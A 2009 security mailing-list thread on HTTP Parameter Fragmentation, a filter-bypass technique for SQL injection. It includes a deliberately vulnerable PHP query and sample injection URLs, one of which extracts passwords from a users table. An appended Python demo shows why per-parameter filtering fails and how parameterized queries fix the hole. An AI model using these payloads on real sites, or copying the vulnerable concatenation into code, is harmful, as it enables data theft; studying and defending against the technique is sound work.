[WEB SECURITY] HTTP parameters fragmentation

Prasad Shenoy prasad.shenoy at gmail.com
Wed Aug 19 14:59:06 EDT 2009


Steve Pinkham nailed it I guess. It is a form of HPP? No?

P. N. Shenoy

On Wed, Aug 19, 2009 at 1:02 PM, lavakumar kuppan <lavakumar.in at gmail.com> wrote:

> Hi Dmitriy,
>
> That is very interesting. It very closely resembles the ModSecurity Filter
> Bypass that I had discovered sometime back.
> There is just one small difference, I was using the same parameter multiple
> times(HTTP Parameter Pollution) while you are using multiple parameters,
> nice trick!
>
> I had written a whitepaper on the same, you can find it at
> http://lavakumar.com/Split_and_Join.pdf
> The ModSecurity advisory is at http://lavakumar.com/modsecurity_hpp.txt
>
> You can find more information about HPP at
> http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf
>
> Hope this helps.
>
> Cheers,
> Lava
> http://www.lavakumar.com
>
>
> 2009/8/19 Dmitriy Evteev <devteev at ptsecurity.com>:
>
> > While preparing an article about WAF bypassing methods, I found an
> > interesting way to bypass filters via HTTP parameters fragmentation.
> >
> >
> >
> > Vulnerable code example
> >
> > Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
> >
> >
> >
> > The following request doesn't allow an attack to be conducted
> >
> > index.php?a=1+union+select+1,2/*
> >
> >
> >
> > The following request succeeded using HPF
> >
> > index.php?a=1+union/*&b=*/select+1,2
> >
> >
> >
> > In this case, the SQL request looks like
> >
> > select * from table where a=1 union/* and b=*/select 1,2
> >
> >
> >
> > Another example:
> >
> > Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit ".$_GET['c']);
> >
> > Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." order by ".$_GET['c']." limit 1");
> >
> >
> >
> > Using HPF (HTTP Parameter Fragmentation), the request succeeded:
> >
> > index.php?a=1+union/*&b=*/select+1,2,pass/*&c=*/from+users--
> >
> >
> >
> > The question is: is there any name for the technique? Please, advise me
> > if you know articles or experts in the field (for example, I found a
> > reference in
> > http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf,
> > page 79).
> >
> > Thank you for help and cooperation in advance!
> >
> >
> >
> > - - - - - - - - - - - - - - -
> > Best Regards, Dmitry Evteev
> > Positive Technologies Co.
> > Tel.: (495) 744-0144
> > Web: http://www.ptsecurity.ru
> >
> >
>
>
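An added illustration of the point made in the thread above, written for this page and not code from any of the posters: the two requests Dmitriy quotes are parsed the way PHP's $_GET would see them, run through a deliberately naive per-parameter signature (an assumption standing in for a filter that inspects each value in isolation, not any real WAF's rule set), and then through the same signature applied to the statement the vulnerable concatenation would actually build. The per-parameter check passes the fragmented request because neither half contains "union select" on its own; inspecting the assembled statement with comments stripped catches it. The last function shows the mitigation that makes the fragmentation irrelevant: a parameterized query (here against an in-memory SQLite table with constructed rows), where the fragments are bound as literal data.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed sample query strings; the payloads are the ones quoted in the thread.
REQUEST_BLOCKED = "a=1+union+select+1,2/*"
REQUEST_HPF = "a=1+union/*&b=*/select+1,2"

# Assumption: a simplified per-value signature, not a real WAF rule.
SIGNATURE = re.compile(r"\bunion\b\s+(all\s+)?select\b", re.IGNORECASE)


def params(query_string):
    """Parse a query string into a flat dict, decoding '+' to ' ' like PHP's $_GET."""
    parsed = parse_qs(query_string, keep_blank_values=True)
    return {k: v[0] for k, v in parsed.items()}


def per_parameter_filter(p):
    """Names of parameters whose value matches the signature on its own."""
    return sorted(k for k, v in p.items() if SIGNATURE.search(v))


def build_vulnerable_sql(p):
    """Mirror of Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']).
    Only builds the string; nothing is executed."""
    return "select * from table where a=%s and b=%s" % (p.get("a", ""), p.get("b", ""))


def strip_comments(sql):
    """Remove /* ... */ comments so fragments joined by a comment are seen as one token stream."""
    return re.sub(r"/\*.*?\*/", " ", sql, flags=re.DOTALL)


def assembled_statement_filter(p):
    """Apply the same signature to the statement the application would build.
    Because every parameter is present at once, the split 'union' / 'select' is visible."""
    return bool(SIGNATURE.search(strip_comments(build_vulnerable_sql(p))))


def safe_query(p):
    """Parameterized form of the same query: values are bound, so the fragments
    cannot change the statement's structure regardless of how they are split."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table t (a text, b text)")
    conn.execute("insert into t values ('1', '2')")  # constructed row
    rows = conn.execute(
        "select * from t where a=? and b=?", (p.get("a", ""), p.get("b", ""))
    ).fetchall()
    conn.close()
    return rows


if __name__ == "__main__":
    for label, qs in (("single parameter", REQUEST_BLOCKED), ("fragmented (HPF)", REQUEST_HPF)):
        p = params(qs)
        print(label)
        print("  per-parameter hits :", per_parameter_filter(p))
        print("  assembled statement:", build_vulnerable_sql(p))
        print("  assembled hit      :", assembled_statement_filter(p))
        print("  parameterized rows :", safe_query(p))
```

The single-parameter request is flagged by the per-parameter check on `a`, while the fragmented request produces no per-parameter hit at all; only the assembled-statement check sees the `union ... select` once the comment between `a` and `b` is removed. The parameterized query returns no rows for either payload, which is the behaviour a reviewer should expect from the fix rather than from any filter in front of the code.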